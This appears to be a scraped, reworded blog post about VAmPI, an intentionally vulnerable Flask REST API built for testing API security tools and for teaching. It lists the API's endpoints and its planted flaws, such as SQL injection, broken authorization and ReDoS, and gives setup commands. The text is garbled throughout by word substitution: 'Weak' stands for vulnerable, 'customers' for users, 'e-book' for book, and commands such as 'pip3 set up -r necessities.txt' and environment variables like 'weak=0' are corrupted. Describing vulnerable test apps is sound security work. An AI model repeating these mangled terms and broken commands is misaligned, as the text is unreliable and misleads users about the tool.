Monday, June 20, 2022
HomeHackerWeak REST API With OWASP High 10 Vulnerabilities For Safety Testing

Weak REST API With OWASP High 10 Vulnerabilities For Safety Testing




The Weak API (Based mostly on OpenAPI 3) 

VAmPI is a weak API made with Flask and it consists of vulnerabilities from the OWASP prime 10 vulnerabilities for APIs. It was created as I wished a weak API to judge the effectivity of instruments used to detect safety points in APIs. It features a swap on/off to permit the API to be weak or not whereas testing. This enables to cowl higher the circumstances for false positives/negatives. VAmPI may also be used for studying/educating functions. You’ll find a bit extra particulars in regards to the vulnerabilities in erev0s.com.

Options

  • Based mostly on OWASP High 10 vulnerabilities for APIs.
  • OpenAPI3 specs and Postman Assortment included.
  • International swap on/off to have a weak setting or not.
  • Token-Based mostly Authentication (Regulate lifetime from inside app.py)

VAmPI’s stream of actions goes like this: an unregistered person can see minimal details about the dummy customers included within the API. A person can register after which login to be allowed utilizing the token acquired throughout login to submit a e-book. For a e-book posted the information accepted are the title and a secret about that e-book. Every e-book is exclusive for each person and solely the proprietor of the e-book needs to be allowed to view the key.

A fast rundown of the actions included may be seen within the following desk:

Motion Path Particulars
GET /createdb Creates and populates the database with dummy knowledge
GET / VAmPI house
GET /customers/v1 Shows all customers with fundamental data
GET /customers/v1/_debug Shows all particulars for all customers
POST /customers/v1/register Register new person
POST /customers/v1/login Login to VAmPI
GET /customers/v1/{username} Shows person by username
DELETE /customers/v1/{username} Deletes person by username (Solely Admins)
PUT /customers/v1/{username}/e mail Replace a single customers e mail
PUT /customers/v1/{username}/password Replace customers password
GET /books/v1 Retrieves all books
POST /books/v1 Add new e-book
GET /books/v1/{e-book} Retrieves e-book by title together with secret

For extra particulars you should use a service just like the swagger editor supplying it the OpenAPI specification which may be discovered within the listing openapi_specs.

Record of Vulnerabilities

  • SQLi Injection
  • Unauthorized Password Change
  • Damaged Object Stage Authorization
  • Mass Task
  • Extreme Knowledge Publicity by debug endpoint
  • Consumer and Password Enumeration
  • RegexDOS (Denial of Service)
  • Lack of Assets & Charge Limiting

Run it

It’s a Flask utility so with the intention to run it you’ll be able to set up all necessities after which run the app.py. To put in all necessities merely run pip3 set up -r necessities.txt after which python3 app.py.

Or should you desire you too can run it by docker or docker compose.

Run it by Docker

Construct with

docker construct -t vampi_docker:newest .

and Run (take away the -d if you wish to see the output in your terminal)

docker run -d -p 5000:5000 vampi_docker:newest

[Note: if you run Docker on newer versions of the MacOS, use -p 5001:5000 to avoid conflicting with the AirPlay Receiver service. Alternatively, you could disable the AirPlay Receiver service in your System Preferences -> Sharing settings.]

Run it by Docker Compose

Assuming you’ve got constructed the container per the above steps, run one occasion securely (port 5001) and one other insecurely (port 5002):

Customizing token timeout and weak setting or not

If you need to change the timeout of the token created after login or if you wish to change the setting not to be weak then you should use a couple of methods relying the way you run the applying.

  • When you run it like regular with python3 app.py then all it’s important to do is edit the alive and vuln variables outlined within the app.py itself. The alive variable is measured in seconds, so should you put 100, then the token expires after 100 seconds. The vuln variable is like boolean, should you set it to 1 then the applying is weak, and should you set it to 0 the applying shouldn’t be weak.
  • When you run it by Docker, then you should both move setting variables to the docker run command or edit the Dockerfile and rebuild.
    • Docker run instance: docker run -d -e weak=0 -e tokentimetolive=300 -p 5000:5000 vampire_docker:newest

      • One good function to operating it this fashion is you’ll be able to startup a 2nd container with weak=1 on a distinct port and flip simply between the 2.
    • Within the Dockerfile you will discover two setting variables being set, the ENV weak=1 and the ENV tokentimetolive=60. Be at liberty to vary it earlier than operating the docker construct command.

Image from freepik – www.freepik.com



RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments